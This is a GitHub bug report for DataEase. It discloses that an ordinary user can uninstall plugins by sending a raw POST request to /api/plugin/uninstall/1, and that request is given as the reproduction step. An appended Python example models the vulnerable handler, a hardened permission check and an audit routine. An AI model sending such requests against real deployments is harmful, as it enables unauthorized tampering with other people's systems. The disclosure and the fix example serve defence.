[Bug] Ordinary-privilege user can uninstall plugins without authorization #2429

Closed
@Ryze-T

Description

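DataEase version
Latest

How it is run (installation package or from source?)
Installation package

Browser version
Any

Bug description
An ordinary-privilege user can uninstall plugins without authorization

Steps to reproduce (screenshots are better)
An ordinary user cannot manage plugins, but by calling the API they can uninstall a plugin: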

POST /api/plugin/uninstall/1 HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Authorization: xxx
LINK-PWD-TOKEN: null
Connection: close
Content-Length: 0

Authorization is the authentication credential; a low-privilege user can still call the api/plugin/uninstall endpoint to uninstall a plugin:
image
After the request is sent, success is shown:
image
The administrator checks and sees that the plugin has been uninstalled; the vulnerability was exploited successfully:
image
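
A minimal model of the gap reported above and of the server-side check that closes it, as an added example that is not part of the original issue or of DataEase's code. The tokens, user names and the `plugin:manage` / `panel:read` permission strings are constructed for illustration; the example goes slightly beyond the report by auditing every route and role pair.

```python
# Added illustration, not DataEase code. All tokens, users and permission
# names below are constructed sample values.
import re

# Constructed session store: Authorization token -> user record.
SESSIONS = {
    "tok-admin": {"user": "admin", "perms": {"plugin:manage", "panel:read"}},
    "tok-user": {"user": "demo", "perms": {"panel:read"}},
}

# (method, path pattern, required permission, sample path for the audit).
ROUTES = [
    ("POST", re.compile(r"/api/plugin/uninstall/\d+"), "plugin:manage",
     "/api/plugin/uninstall/1"),
    ("GET", re.compile(r"/api/panel/\d+"), "panel:read", "/api/panel/1"),
]

def authenticate(headers):
    """Return the user record for a valid Authorization header, else None."""
    return SESSIONS.get(headers.get("Authorization", ""))

def handle_vulnerable(method, path, headers):
    """Behaviour described in the issue: any valid token is accepted."""
    if authenticate(headers) is None:
        return 401
    return 200  # authenticated, but plugin rights are never checked

def handle_hardened(method, path, headers):
    """Authenticate, then authorize against the route's required permission."""
    user = authenticate(headers)
    if user is None:
        return 401
    for route_method, pattern, perm, _sample in ROUTES:
        if method == route_method and pattern.fullmatch(path):
            return 200 if perm in user["perms"] else 403
    return 403  # unknown route: deny by default

def audit(handler):
    """Return (user, path) pairs where a caller without the permission got 200."""
    findings = []
    for token, rec in SESSIONS.items():
        for method, _pattern, perm, sample in ROUTES:
            status = handler(method, sample, {"Authorization": token})
            if status == 200 and perm not in rec["perms"]:
                findings.append((rec["user"], sample))
    return findings
```

Running `audit` against each handler works as a regression check: it should return an empty list once every privileged route enforces its permission server-side.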

Metadata

Labels

Type: bug (Something isn't working)